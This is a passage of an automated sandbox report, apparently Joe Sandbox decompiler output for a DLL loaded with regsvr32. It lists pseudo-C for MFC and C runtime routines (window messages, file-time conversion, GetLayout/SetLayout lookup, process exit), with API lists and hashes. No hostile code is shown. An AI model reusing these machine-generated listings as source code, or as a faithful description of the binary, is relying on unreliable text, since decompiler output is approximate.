                                                                                                            						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
                                                                                                            						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t63 =  *((intOrPtr*)(_t72 + 0x44));
                                                                                                            				if(_t63 != 0) {
                                                                                                            					 *((intOrPtr*)( *_t63 + 0x50))();
                                                                                                            					 *((intOrPtr*)(_t72 + 0x44)) = 0;
                                                                                                            				}
                                                                                                            				_t64 =  *(_t72 + 0x48);
                                                                                                            				if(_t64 != 0) {
                                                                                                            					 *((intOrPtr*)( *_t64 + 4))(1);
                                                                                                            				}
                                                                                                            				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
                                                                                                            				if(( *(_t72 + 0x38) & 1) != 0) {
                                                                                                            					_t71 =  *((intOrPtr*)(E100373DB() + 0x3c));
                                                                                                            					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
                                                                                                            						E10011C50( &_v52, 0, 0x30);
                                                                                                            						_t48 =  *(_t72 + 0x1c);
                                                                                                            						_v44 = _t48;
                                                                                                            						_v40 = _t48;
                                                                                                            						_v52 = 0x28;
                                                                                                            						_v48 = 1;
                                                                                                            						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
                                                                                                            				E1002204B(_t72);
                                                                                                            				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
                                                                                                            					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                                                                            					if(_t43 != 0) {
                                                                                                            						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				E10022168(_t72);
                                                                                                            				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                                                                            			}
















                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                            • String ID: (
                                                                                                            • API String ID: 2178440468-3887548279
                                                                                                            • Opcode ID: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                                                            • Instruction ID: 74d92888995a03eb436cf4db0a6f1431d092ba1e50ceac8416b65ae125f9645e
                                                                                                            • Opcode Fuzzy Hash: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                                                            • Instruction Fuzzy Hash: 0C31AD34600615FFCB21DFA9E884A6EB7F8FF04250F52062DE5429B692CB31F848CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10032286(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
                                                                                                            				void* __ebp;
                                                                                                            				void* _t29;
                                                                                                            				int _t30;
                                                                                                            				void* _t35;
                                                                                                            				void* _t38;
                                                                                                            				intOrPtr* _t40;
                                                                                                            				int _t42;
                                                                                                            				intOrPtr* _t45;
                                                                                                            				void* _t46;
                                                                                                            
                                                                                                            				_t45 = __ecx;
                                                                                                            				_t29 = E10022AD5(__ecx);
                                                                                                            				_t40 =  *((intOrPtr*)(_t45 + 0x7c));
                                                                                                            				_t42 = _a4;
                                                                                                            				_t38 = _t29;
                                                                                                            				if(_t40 == 0) {
                                                                                                            					L2:
                                                                                                            					if(_a8 != 0xffff) {
                                                                                                            						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
                                                                                                            							 *(_t45 + 0xa4) =  *(_t45 + 0xa4) & 0x00000000;
                                                                                                            							goto L17;
                                                                                                            						} else {
                                                                                                            							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
                                                                                                            								if(_t42 < 0xff00) {
                                                                                                            									goto L13;
                                                                                                            								}
                                                                                                            								 *(_t45 + 0xa4) = 0xef1f;
                                                                                                            								goto L17;
                                                                                                            							} else {
                                                                                                            								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
                                                                                                            								L13:
                                                                                                            								 *(_t45 + 0xa4) = _t42;
                                                                                                            								L17:
                                                                                                            								 *(_t38 + 0x38) =  *(_t38 + 0x38) | 0x00000040;
                                                                                                            								L18:
                                                                                                            								_t30 =  *(_t45 + 0xa4);
                                                                                                            								if(_t30 ==  *((intOrPtr*)(_t45 + 0xa8))) {
                                                                                                            									L21:
                                                                                                            									return _t30;
                                                                                                            								}
                                                                                                            								_t30 = E100220EE(_t46, GetParent( *(_t45 + 0x1c)));
                                                                                                            								if(_t30 == 0) {
                                                                                                            									goto L21;
                                                                                                            								}
                                                                                                            								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *(_t45 + 0x38) =  *(_t45 + 0x38) & 0xffffffbf;
                                                                                                            					if( *((intOrPtr*)(_t38 + 0x64)) != 0) {
                                                                                                            						 *(_t45 + 0xa4) = 0xe002;
                                                                                                            					} else {
                                                                                                            						 *(_t45 + 0xa4) = 0xe001;
                                                                                                            					}
                                                                                                            					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0xa4), 0);
                                                                                                            					_t35 =  *((intOrPtr*)( *_t45 + 0x150))();
                                                                                                            					if(_t35 != 0) {
                                                                                                            						UpdateWindow( *(_t35 + 0x1c));
                                                                                                            					}
                                                                                                            					goto L18;
                                                                                                            				}
                                                                                                            				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
                                                                                                            				if(_t30 != 0) {
                                                                                                            					goto L21;
                                                                                                            				}
                                                                                                            				goto L2;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$ParentPostSendUpdateWindow
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4141989945-2766056989
                                                                                                            • Opcode ID: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                                                            • Instruction ID: 6191196fd6615e40dc101e77c52f198469b7c7f61996bf1ea28baad2e91494f1
                                                                                                            • Opcode Fuzzy Hash: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                                                            • Instruction Fuzzy Hash: 8D319635601B05EFEB22CF21CD48B5A77E5FF41352F258828E65A9E1A1C7B9A980DB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10026A96(void* __ecx, void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
                                                                                                            				struct _FILETIME _v12;
                                                                                                            				struct _SYSTEMTIME _v28;
                                                                                                            				char _v44;
                                                                                                            				void* __ebp;
                                                                                                            				int _t23;
                                                                                                            				int _t26;
                                                                                                            				int _t29;
                                                                                                            				int _t31;
                                                                                                            				void* _t40;
                                                                                                            				void* _t56;
                                                                                                            				void* _t59;
                                                                                                            
                                                                                                            				_t47 = __edx;
                                                                                                            				_t40 = __ecx;
                                                                                                            				_t56 = _t59;
                                                                                                            				if(_a8 != 0) {
                                                                                                            					_t52 = _a4;
                                                                                                            					_v28.wYear = E10010297(__eflags);
                                                                                                            					_v28.wMonth = E100102AE(__eflags);
                                                                                                            					_t23 = E100134E7(_a4, __edx, _a4);
                                                                                                            					__eflags = _t23;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						_v28.wDay = 0;
                                                                                                            					} else {
                                                                                                            						_v28.wDay =  *((intOrPtr*)(_t23 + 0xc));
                                                                                                            					}
                                                                                                            					_v28.wHour = E100102C1(__eflags);
                                                                                                            					_v28.wMinute = E100102D4(__eflags);
                                                                                                            					_t26 = E100134E7(_t52, _t47, _t52);
                                                                                                            					__eflags = _t26;
                                                                                                            					if(_t26 == 0) {
                                                                                                            						_t14 =  &(_v28.wSecond);
                                                                                                            						 *_t14 = _v28.wSecond | 0x0000ffff;
                                                                                                            						__eflags =  *_t14;
                                                                                                            					} else {
                                                                                                            						_v28.wSecond =  *_t26;
                                                                                                            					}
                                                                                                            					_v28.wMilliseconds = 0;
                                                                                                            					_t29 = SystemTimeToFileTime( &_v28,  &_v12);
                                                                                                            					__eflags = _t29;
                                                                                                            					if(_t29 == 0) {
                                                                                                            						E100271C6(_t56, GetLastError(), 0);
                                                                                                            					}
                                                                                                            					_t31 = LocalFileTimeToFileTime( &_v12, _a8);
                                                                                                            					__eflags = _t31;
                                                                                                            					if(_t31 == 0) {
                                                                                                            						_t31 = E100271C6(_t56, GetLastError(), 0);
                                                                                                            					}
                                                                                                            					return _t31;
                                                                                                            				} else {
                                                                                                            					_push(_t56);
                                                                                                            					_push(__ecx);
                                                                                                            					_v44 = 0x1004d548;
                                                                                                            					E10011C0F( &_v44, 0x10045e48);
                                                                                                            					asm("int3");
                                                                                                            					return  *((intOrPtr*)(_t40 + 0x70));
                                                                                                            				}
                                                                                                            			}















                                                                                                            APIs
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 10026B18
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10026B29
                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,0000FFFF), ref: 10026B38
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10026B43
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$ErrorLast$LocalSystem
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1172841412-4125583295
                                                                                                            • Opcode ID: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                                                            • Instruction ID: f1a830ef30183d99209262c84c87e780bb224e30df7a02b89f1332faec0a7339
                                                                                                            • Opcode Fuzzy Hash: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                                                            • Instruction Fuzzy Hash: 4C11B929A1021DAACF01EBE59C458AF7B7CEF44750B41405BF805E7211EB74D681CB9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E100257A8(void* __ecx, void* __esi) {
                                                                                                            				void* _v8;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t9;
                                                                                                            				void* _t11;
                                                                                                            				void* _t23;
                                                                                                            				intOrPtr* _t30;
                                                                                                            				void* _t32;
                                                                                                            				void* _t35;
                                                                                                            
                                                                                                            				_t32 = __esi;
                                                                                                            				_push(__ecx);
                                                                                                            				_t23 = __ecx;
                                                                                                            				_t9 = E1001F77E(0x10);
                                                                                                            				_t36 = _t9;
                                                                                                            				if(_t9 == 0) {
                                                                                                            					_t30 = 0;
                                                                                                            					__eflags = 0;
                                                                                                            				} else {
                                                                                                            					_t30 = E10025742(_t9, _t36, 0xffffffff);
                                                                                                            				}
                                                                                                            				_push(_t32);
                                                                                                            				_t11 = GetCurrentProcess();
                                                                                                            				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
                                                                                                            					if(_t30 != 0) {
                                                                                                            						 *((intOrPtr*)( *_t30 + 4))(1);
                                                                                                            					}
                                                                                                            					E100271C6(_t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t30 + 4)) = _v8;
                                                                                                            				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
                                                                                                            				return _t30;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 100257DC
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 100257E2
                                                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 100257E5
                                                                                                            • GetLastError.KERNEL32(?), ref: 10025800
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3907606552-4125583295
                                                                                                            • Opcode ID: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                                                            • Instruction ID: ac2035d42823edd271a7cb90e834c31b18cb545283139df8f74de7ed2b30b58d
                                                                                                            • Opcode Fuzzy Hash: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                                                            • Instruction Fuzzy Hash: 9A01D435740204AFEB01DBA9EC89F5A7BA8EF84761F104515F905CF182EB71EC0097A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10034CE3(void* __ecx, void* __eflags) {
                                                                                                            				intOrPtr _t18;
                                                                                                            				intOrPtr* _t20;
                                                                                                            				intOrPtr _t26;
                                                                                                            				void* _t33;
                                                                                                            				void* _t35;
                                                                                                            
                                                                                                            				E10011BF0(0x1003a3fc, _t35);
                                                                                                            				_push(__ecx);
                                                                                                            				_t33 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t35 - 0x10)) = 0;
                                                                                                            				E10034BFF(__ecx, 0x20, _t35 - 0x10);
                                                                                                            				if( *((intOrPtr*)(_t35 + 8)) != 0 &&  *((intOrPtr*)(_t35 - 0x10)) == 0) {
                                                                                                            					_t26 = E1001F77E(0x20);
                                                                                                            					 *((intOrPtr*)(_t35 - 0x10)) = _t26;
                                                                                                            					_t41 = _t26;
                                                                                                            					 *(_t35 - 4) = 0;
                                                                                                            					if(_t26 == 0) {
                                                                                                            						_t20 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            					} else {
                                                                                                            						_push(0x1e);
                                                                                                            						_push( *((intOrPtr*)(_t35 + 8)));
                                                                                                            						_push("File%d");
                                                                                                            						_push("Recent File List");
                                                                                                            						_push(0);
                                                                                                            						_t20 = E10024F0F(_t26, _t41);
                                                                                                            					}
                                                                                                            					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
                                                                                                            					 *((intOrPtr*)(_t33 + 0x84)) = _t20;
                                                                                                            					 *((intOrPtr*)( *_t20 + 0x10))();
                                                                                                            				}
                                                                                                            				_t18 = E1003599F(_t33, "Settings", "PreviewPages", 0);
                                                                                                            				 *((intOrPtr*)(_t33 + 0x90)) = _t18;
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
                                                                                                            				return _t18;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10034CE8
                                                                                                              • Part of subcall function 10024F0F: __EH_prolog.LIBCMT ref: 10024F14
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID: File%d$PreviewPages$Recent File List$Settings
                                                                                                            • API String ID: 3519838083-526586445
                                                                                                            • Opcode ID: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                                                            • Instruction ID: 492fd1891bf7533495f0361d30171d8b100ab146b8dd749383e38376895f11d0
                                                                                                            • Opcode Fuzzy Hash: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                                                            • Instruction Fuzzy Hash: FA01B579A00605AFCB16EF649C05BEEBAB5FB84712F11861FF1569F281DF70A5408750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10028BC6(void* __ecx, intOrPtr _a4) {
                                                                                                            				struct HINSTANCE__* _t4;
                                                                                                            				_Unknown_base(*)()* _t5;
                                                                                                            				void* _t9;
                                                                                                            				void* _t10;
                                                                                                            
                                                                                                            				_t10 = __ecx;
                                                                                                            				_t4 = GetModuleHandleA("GDI32.DLL");
                                                                                                            				_t9 = 0;
                                                                                                            				_t5 = GetProcAddress(_t4, "SetLayout");
                                                                                                            				if(_t5 == 0) {
                                                                                                            					if(_a4 != 0) {
                                                                                                            						_t9 = 0xffffffff;
                                                                                                            						SetLastError(0x78);
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                                                                                                            				}
                                                                                                            				return _t9;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                                                            • SetLastError.KERNEL32(00000078,?,?,10030BC6,00000000), ref: 10028BFF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                            • String ID: GDI32.DLL$SetLayout
                                                                                                            • API String ID: 4275029093-2147214759
                                                                                                            • Opcode ID: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                                                            • Instruction ID: de10e2654153e74bad07dc63c5cb2a97a5a293e8e121725d640a5f2c86b9b1e6
                                                                                                            • Opcode Fuzzy Hash: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                                                            • Instruction Fuzzy Hash: 1AE02077105110BFD253875A9C48C5F7B62D7C4372B11C619F276D5090CB3188018721
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10028B90(signed int __ecx) {
                                                                                                            				_Unknown_base(*)()* _t3;
                                                                                                            				signed int _t7;
                                                                                                            				signed int _t8;
                                                                                                            
                                                                                                            				_t7 = __ecx;
                                                                                                            				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                                                                                                            				if(_t3 == 0) {
                                                                                                            					_t8 = _t7 | 0xffffffff;
                                                                                                            					SetLastError(0x78);
                                                                                                            				} else {
                                                                                                            					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                                                                                                            				}
                                                                                                            				return _t8;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 10028BBC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                            • String ID: GDI32.DLL$GetLayout
                                                                                                            • API String ID: 4275029093-2396518106
                                                                                                            • Opcode ID: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                                                            • Instruction ID: 54bc3d33d325d2134ddbcfb4761d493361e18e0aa1f1c781400aef32ec3f8dd9
                                                                                                            • Opcode Fuzzy Hash: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                                                            • Instruction Fuzzy Hash: BBD05EB6A052346FDAA35BF5AC4CE5A7A54DB047B2B418669FD65EA1E0CB24CC008790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10011DCF(int _a4) {
                                                                                                            				struct HINSTANCE__* _t3;
                                                                                                            				_Unknown_base(*)()* _t4;
                                                                                                            
                                                                                                            				_t3 = GetModuleHandleA("mscoree.dll");
                                                                                                            				if(_t3 != 0) {
                                                                                                            					_t4 = GetProcAddress(_t3, "CorExitProcess");
                                                                                                            					if(_t4 != 0) {
                                                                                                            						 *_t4(_a4);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				ExitProcess(_a4);
                                                                                                            			}






                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(mscoree.dll,10011F3D,?,10041DB0,00000008,10011F63,?,00000001,00000000,10016CF1,00000003), ref: 10011DD4
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011DE4
                                                                                                            • ExitProcess.KERNEL32 ref: 10011DF8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressExitHandleModuleProcProcess
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 75539706-1276376045
                                                                                                            • Opcode ID: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                                                            • Instruction ID: 44dc424d0b29a2a163b933457fd361873f6b0f507bf76f9d722852a62850aa7a
                                                                                                            • Opcode Fuzzy Hash: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                                                            • Instruction Fuzzy Hash: F2D0C9B0604217AFEA429BB2CD48DEB3AA8EF406857108428F416D8021CF31CD019B11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 53%
                                                                                                            			E100394B0(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                            				CHAR* _t94;
                                                                                                            				void* _t100;
                                                                                                            				intOrPtr _t101;
                                                                                                            				void* _t108;
                                                                                                            				intOrPtr _t114;
                                                                                                            				void* _t116;
                                                                                                            				void* _t117;
                                                                                                            				void* _t120;
                                                                                                            				signed short _t123;
                                                                                                            				signed int _t125;
                                                                                                            				signed int _t128;
                                                                                                            				void* _t134;
                                                                                                            				char _t140;
                                                                                                            				CHAR* _t144;
                                                                                                            				intOrPtr* _t147;
                                                                                                            				void* _t149;
                                                                                                            				void* _t151;
                                                                                                            				intOrPtr _t153;
                                                                                                            				signed short* _t156;
                                                                                                            				void* _t157;
                                                                                                            				CHAR* _t159;
                                                                                                            				int _t161;
                                                                                                            				char* _t166;
                                                                                                            				void* _t167;
                                                                                                            				void* _t168;
                                                                                                            				void* _t170;
                                                                                                            				CHAR* _t171;
                                                                                                            				char* _t174;
                                                                                                            				CHAR* _t182;
                                                                                                            
                                                                                                            				_t153 = __edx;
                                                                                                            				_t148 = __ecx;
                                                                                                            				E10011BF0(0x1003b2f6, _t168);
                                                                                                            				_t171 = _t170 - 0x2c;
                                                                                                            				_t144 =  *(_t168 + 8);
                                                                                                            				_t94 = _t144[8];
                                                                                                            				 *(_t168 - 0x10) = _t171;
                                                                                                            				 *((intOrPtr*)(_t168 - 0x20)) = __ecx;
                                                                                                            				 *(_t168 - 0x11) = 0;
                                                                                                            				 *(_t168 + 8) = _t94;
                                                                                                            				if(_t94 == 0) {
                                                                                                            					 *(_t168 + 8) = _t168 - 0x11;
                                                                                                            				}
                                                                                                            				_t161 = lstrlenA( *(_t168 + 8));
                                                                                                            				 *(_t168 - 0x18) = _t144[0x10];
                                                                                                            				 *(_t168 - 0x1c) = _t144[0xc];
                                                                                                            				if(( *(_t168 + 0xc) & 0x0000000c) == 0) {
                                                                                                            					L7:
                                                                                                            					_t145 =  *(_t168 + 0x14);
                                                                                                            					_t100 = E10001000(_t148, ( *(_t168 + 0x14))[8] << 4);
                                                                                                            					_pop(_t149);
                                                                                                            					if(_t100 == 0) {
                                                                                                            						L9:
                                                                                                            						_t101 = 0x8007000e;
                                                                                                            						L47:
                                                                                                            						 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
                                                                                                            						return _t101;
                                                                                                            					}
